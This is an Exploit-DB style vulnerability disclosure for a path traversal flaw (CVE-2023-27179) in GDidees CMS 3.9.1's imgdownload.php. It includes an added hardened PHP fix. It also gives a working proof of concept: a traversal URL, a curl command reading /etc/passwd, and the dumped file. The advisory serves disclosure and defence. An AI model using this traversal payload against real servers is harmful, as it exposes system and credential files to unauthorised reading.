GDidees CMS 3.9.1 – Local File Disclosure

  • Author: Hadi Mene
  • Date: 2023-04-20
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/51381/
    # Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
    # Date : 03/27/2023
    # Exploit Author : Hadi Mene
    # Vendor Homepage : https://www.gdidees.eu/
    # Software Link : https://www.gdidees.eu/cms-1-0.html
    # Version : 3.9.1 and earlier
    # Tested on : Debian 11
    # CVE : CVE-2023-27179
    
    ### Summary:
    
    GDidees CMS v3.9.1 and earlier contain a local file disclosure vulnerability via the filename parameter of /_admin/imgdownload.php.
    
    
    ### Description :

    imgdownload.php is used mainly by the QR code generation module to download a generated QR code.
    The vulnerability is at line 4, where the filename parameter, later passed to readfile(), is neither filtered nor sanitized.
    Furthermore, the script performs no admin session check, although it should, since only the admin user should normally
    be able to download QR codes.
    
    Vulnerable Code (imgdownload.php, line numbers as in the original file):

    3.  if (isset($_GET["filename"])) {
    4.      $filename = $_GET["filename"];
        .....
        .....
    27.     @readfile($filename) OR die();
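    A hardened version of the handler, added here as an example and not GDidees' own code: it requires an admin session, accepts only a bare file name made of safe characters with an image extension, and canonicalises the path with realpath() before checking that it still lies under the QR code directory. The session key admin_logged_in, the qrcodes directory and the extension list are assumptions for illustration; adapt them to the CMS.

```php
<?php
// Hardened replacement for imgdownload.php (added example, not the CMS's own code).
// Assumptions: $_SESSION['admin_logged_in'] marks an authenticated admin,
// generated QR codes live in ../qrcodes, and only image extensions are served.
declare(strict_types=1);

session_start();

// 1. Authorization: the original script has no session check at all.
if (empty($_SESSION['admin_logged_in'])) {
    http_response_code(403);
    exit('Forbidden');
}

// 2. Pin downloads to one directory. realpath() also resolves symlinks.
$baseDir = realpath(__DIR__ . '/../qrcodes');
if ($baseDir === false) {
    http_response_code(500);
    exit('Download directory not available');
}

$name = $_GET['filename'] ?? '';

// 3. Allow-list the name: letters, digits, dot, dash, underscore only,
//    so "../", slashes, NUL bytes and header-breaking quotes are all rejected.
if (!is_string($name) || !preg_match('/^[A-Za-z0-9_.-]+$/', $name) || $name === '.' || $name === '..') {
    http_response_code(400);
    exit('Bad request');
}

// 4. Only serve the image types the QR module produces.
$allowedExt = ['png', 'jpg', 'jpeg', 'gif'];
$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    http_response_code(400);
    exit('Bad request');
}

// 5. Canonicalise the full path and verify it is still inside $baseDir.
//    This is the check that defeats traversal even if step 3 were relaxed.
$path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
$prefix = $baseDir . DIRECTORY_SEPARATOR;
if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
    http_response_code(404);
    exit('Not found');
}

// 6. Serve the file with explicit headers instead of a bare @readfile().
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

    Steps 3 and 5 are deliberately redundant: the character allow-list makes the response headers safe and rejects traversal syntactically, while the realpath() prefix check rejects it semantically, so a later relaxation of one rule (for example to permit subdirectories) does not silently reintroduce the disclosure.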
    
    
    ### POC :

    URL: https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd

    Exploitation using curl:
    # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    ntp:x:104:110::/nonexistent:/usr/sbin/nologin
    messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
    uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
    pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
    lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
    hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    vboxadd:x:998:1::/var/run/vboxadd:/bin/false
    openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
    sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
    mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
    
    
    ### References:
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
    https://nvd.nist.gov/vuln/detail/CVE-2023-27179
    https://www.exploit-db.com/papers/12883